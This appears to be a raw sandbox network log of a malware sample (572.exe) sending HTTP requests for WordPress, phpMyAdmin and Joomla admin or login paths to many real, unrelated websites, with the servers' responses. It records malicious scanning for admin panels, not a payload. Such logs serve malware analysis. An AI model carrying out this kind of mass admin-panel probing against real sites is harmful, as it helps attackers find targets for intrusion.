X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_OKB7WrBtq7gd7F0ms7RAcd/snarZhs4nur5ULU0/whmtIca/yk9ak7iZzxE7w3HJMbMx6BASOtNCTzxf6I8+tg
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
Feb 5, 2024 12:14:52.287332058 CET | 382 | OUT | GET /wp-admin/ HTTP/1.1
Host: secure.vexcorp.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=81.181.57.74; _policy={"restricted_market":false,"tracking_market":"none"}; country=RO; city=""
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://secure.vexcorp.com/wp-login.php
Feb 5, 2024 12:14:52.408469915 CET | 1190 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html
Content-Length: 315
Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT
Connection: keep-alive
ETag: "65b834cc-13b"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UvizrpI/g1QfpV6I+4Dwye5JZlidZbmD9MDxlqh1ZX2psdWsek8Ct502wrjgKXNE/PcJ20t+C5OrclrMPaWatg
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
252 | 192.168.2.6 | 56392 | 23.4.32.216 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.115837097 CET | 179 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: steamcommunity.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.237099886 CET | 185 | IN | HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: https://steamcommunity.com/phpMyAdmin/
Date: Mon, 05 Feb 2024 11:14:52 GMT
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
253 | 192.168.2.6 | 56404 | 96.7.224.178 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.118060112 CET | 176 | OUT | GET /wp-login.php HTTP/1.1
Host: naukrigulf.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.239166021 CET | 635 | IN | HTTP/1.1 403 Forbidden
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 279
Expires: Mon, 05 Feb 2024 11:14:52 GMT
Date: Mon, 05 Feb 2024 11:14:52 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
Server-Timing: edge; dur=1
Server-Timing: ak_p; desc="1707131692179_1611129006_213760295_11_8707_0_0_-";dur=1
Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;wp&#45;login&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131692&#46;cbdb927</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
254 | 192.168.2.6 | 56106 | 185.120.71.26 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.154366016 CET | 180 | OUT | GET /administrator/ HTTP/1.1
Host: www.analvids.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.364083052 CET | 385 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: https://www.analvids.com/administrator/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
255 | 192.168.2.6 | 56181 | 104.21.14.245 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.265022993 CET | 176 | OUT | GET /wp-login.php HTTP/1.1
Host: ag.ufa9999.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.396264076 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:15:07 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BhAGiaxVKVO%2FWM0P0dvf67Exyiv0%2Fsc%2BreFc2Rw9417O5wwrVWr8h6F%2BHuGVGAQcOTJjqUvh5ZtWLvjvOgY5xv0QnK6GitDB5vUDB9Rsq%2F1TqxsFxyoYFxbBHnBV3vVVdA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb74fa3c12d3-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
Feb 5, 2024 12:14:52.396281958 CET | 1198 | IN
Feb 5, 2024 12:14:52.396298885 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:14:52.397514105 CET | 218 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ag.ufa9999.com/wp-login.php
Feb 5, 2024 12:14:52.520472050 CET | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rnHUskwPaTak3RTPHyRhhoWMf8E7rS6yw0kRm6829YQyRTYm9KQeQ1tmAj%2BNlN9t9rc0GLcTTzHs%2F%2BxjvvnYDNXPDSEbDAA1WvXswTBApw3%2FfZRwtHcUvinf6%2BszZf5QVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb75da9112d3-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
Feb 5, 2024 12:14:52.520489931 CET | 1196 | IN
Feb 5, 2024 12:14:52.520503998 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
256 | 192.168.2.6 | 56428 | 54.183.63.241 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.356218100 CET | 180 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.514210939 CET | 369 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                location: https://pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 5, 2024 12:14:52.514228106 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:06.448256016 CET | 177 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.634480953 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=005c033de8762365d836e38a023bc42d; expires=Mon, 04 Mar 2024 11:16:06 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=005c033de8762365d836e38a023bc42d; expires=Mon, 04 Mar 2024 11:16:06 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: ar391KuAO98H7mqEEDsFG14oxg
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
257         192.168.2.6  56449        64.91.249.20    80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:52.357544899 CET  258  OUT  GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ww1.chainmine.io/administrator/?usid=27&utid=4923801068
Feb 5, 2024 12:14:52.506167889 CET  369  IN  HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: http://ww12.chainmine.io/administrator/index.php?usid=27&utid=4923801494
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
258         192.168.2.6  56362        41.33.126.100   80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:52.357870102 CET  183  OUT  GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.613580942 CET  146  IN  HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://student.emis.gov.eg/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
Feb 5, 2024 12:16:05.886864901 CET  192  OUT  GET /administrator/index.php HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.140635014 CET  155  IN  HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://student.emis.gov.eg/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
259         192.168.2.6  56522        3.163.115.86    80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:14:52.361589909 CET  178  OUT  GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: connect.appen.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.463053942 CET  578  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://connect.appen.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 392ae56b81ecdd89977a6262a9d12eb2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL58-P9
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: qyfqYvnT6f3OXyJ0eAoYZ5pnSCr2w3UIh4GurYQRmElcy0BhU4lD7w==
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
260 | 192.168.2.6 | 56514 | 104.22.43.158 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.361648083 CET | 181 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.701539993 CET | 445 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7598c8457b-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
Feb 5, 2024 12:14:52.701556921 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
261 | 192.168.2.6 | 56537 | 104.21.5.25 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.361727953 CET | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: opsu.terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.488421917 CET | 701 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://terna.net
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1oTphD858jXi4KTeiPDCvj2%2BcVrZmZtukw5QYhtTHAI6wpjHy4IHioPH%2BrDvO620yKZMpjrH7oWP%2FpvNU8w3sawZU8aJA%2FM%2BdPGYHzTWMBnQCFuRI7FGgmouOSOvBSatWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb759b66674d-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
262 | 192.168.2.6 | 56527 | 3.141.96.53 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.361757040 CET | 174 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.485356092 CET | 149 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
263 | 192.168.2.6 | 56361 | 47.246.167.169 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.361903906 CET | 192 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.sellercenter.lazada.com.my
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.706695080 CET | 303 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 357
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.sellercenter.lazada.com.my/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser/Aserver
                                                                                                                                                                                                                                                                                                                                                                EagleEye-TraceId: 21411e1e17071316925297211e8cdf
                                                                                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
Feb 5, 2024 12:14:52.706708908 CET | 357 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>301 Moved Permanently</title></head><body bgcolor="white"><h1>301 Moved Permanently</h1><p>Th


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
264 | 192.168.2.6 | 56463 | 64.190.63.136 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.362024069 CET | 230 | OUT | GET /administrator/?sub1=20240205-2214-51bd-9054-4443f76afe9b HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:52.602420092 CET | 88 | IN | HTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
Feb 5, 2024 12:14:52.938167095 CET | 338 | OUT | GET /administrator/index.php?sub1=20240205-2214-52f0-ba33-ad43e9ad61a1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ww16.followerstiktok.xyz/administrator/?sub1=20240205-2214-51bd-9054-4443f76afe9b
Feb 5, 2024 12:14:53.147805929 CET | 88 | IN | HTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
265 | 192.168.2.6 | 56572 | 96.7.224.178 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:52.397922039 CET | 218 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://naukrigulf.com/wp-login.php
Feb 5, 2024 12:14:52.512114048 CET | 635 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 276
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131692451_1611129006_213760407_15_10881_106_0_-";dur=1
